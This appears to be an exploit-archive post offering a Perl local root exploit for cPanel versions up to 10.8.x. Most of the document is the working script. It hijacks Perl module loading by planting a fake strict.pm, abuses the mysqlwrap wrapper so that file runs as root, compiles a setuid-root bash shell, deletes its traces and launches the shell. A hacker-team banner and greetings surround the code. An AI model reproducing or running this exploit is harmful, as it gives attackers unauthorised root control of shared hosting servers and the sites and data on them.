ExploitFixes
[D] cPanel <= 10.8.x cpwrap root exploit via mysqladmin [z] 2010-12-23 12:40:29
Posted by: kedans

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] cPanel <= 10.8.x cpwrap root exploit via mysqladmin [z]

# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Type : Perl

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#!/usr/bin/perl -w

#- cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# By KedAns
# [D] HaCkErS-StreeT-Team[Z]

my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }

open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);

open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "Maildir" ) {
system("./Maildir");
}
else {
unlink "strict.pm";
die "Failed\n";
}
# By KedAns-Dz

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z]

-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --